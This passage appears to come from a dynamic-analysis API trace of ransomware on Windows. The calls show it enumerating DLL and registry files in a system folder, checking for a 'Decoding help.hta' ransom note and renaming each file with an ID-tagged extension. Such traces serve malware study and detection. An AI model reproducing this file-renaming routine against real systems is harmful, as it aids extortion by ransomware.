files\\system\\msadc\\handler.reg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.999] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a4b8b3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a4b8b3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x2d63e7d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x24c, dwReserved0=0x0, dwReserved1=0x0, cFileName="handsafe.reg", cAlternateFileName="")) returned 1 [0058.999] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0058.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0058.999] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0058.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0058.999] lstrcmpiW (lpString1="Decoding help.hta", lpString2="handsafe.reg") returned -1 [0058.999] lstrlenW (lpString="handsafe.reg") returned 12 [0058.999] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0058.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0058.999] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="handsafe.reg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" [0058.999] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" [0058.999] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handsafe.reg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\handsafe.reg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.999] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b36a80d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8b36a80d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8b6180d2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0058.999] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0058.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0058.999] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0058.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.000] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadce.dll") returned -1 [0059.000] lstrlenW (lpString="msadce.dll") returned 10 [0059.000] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.000] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.000] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msadce.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" [0059.000] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" [0059.000] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.000] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc13c33e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc13c33e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80e1eed0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcer.dll", cAlternateFileName="")) returned 1 [0059.000] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.000] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.000] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.000] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.000] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcer.dll") returned -1 [0059.000] lstrlenW (lpString="msadcer.dll") returned 11 [0059.000] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.000] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.000] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msadcer.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" [0059.000] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" [0059.000] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.001] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9e4ffc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9e4ffc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9e4ffc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcf.dll", cAlternateFileName="")) returned 1 [0059.001] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.001] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.001] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.001] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.001] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcf.dll") returned -1 [0059.001] lstrlenW (lpString="msadcf.dll") returned 10 [0059.001] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.001] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.002] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msadcf.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll" [0059.002] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll" [0059.002] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcf.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcf.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.002] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbf732e2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfbf732e2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80e6a9c0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcfr.dll", cAlternateFileName="")) returned 1 [0059.002] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.002] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.002] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.002] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.002] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcfr.dll") returned -1 [0059.002] lstrlenW (lpString="msadcfr.dll") returned 11 [0059.002] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.002] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.002] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msadcfr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll" [0059.002] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll" [0059.002] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcfr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcfr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.002] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9bee9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9bee9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9e4ffc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadco.dll", cAlternateFileName="")) returned 1 [0059.003] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.003] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.003] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.003] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadco.dll") returned -1 [0059.003] lstrlenW (lpString="msadco.dll") returned 10 [0059.003] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.003] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.003] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msadco.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" [0059.003] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" [0059.003] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.003] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.003] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc0a3dca, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc0a3dca, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80edd5b0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcor.dll", cAlternateFileName="")) returned 1 [0059.003] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.003] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.003] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.003] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcor.dll") returned -1 [0059.003] lstrlenW (lpString="msadcor.dll") returned 11 [0059.003] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.003] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.004] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msadcor.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" [0059.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" [0059.004] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.004] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84872aa8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84872aa8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84872aa8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcs.dll", cAlternateFileName="")) returned 1 [0059.004] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.004] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.004] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.005] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadcs.dll") returned -1 [0059.005] lstrlenW (lpString="msadcs.dll") returned 10 [0059.005] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.005] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msadcs.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll" [0059.005] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll" [0059.005] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcs.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcs.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.005] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3801e6, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc3801e6, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x345eeb10, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadds.dll", cAlternateFileName="")) returned 1 [0059.005] lstrcpyW (in: 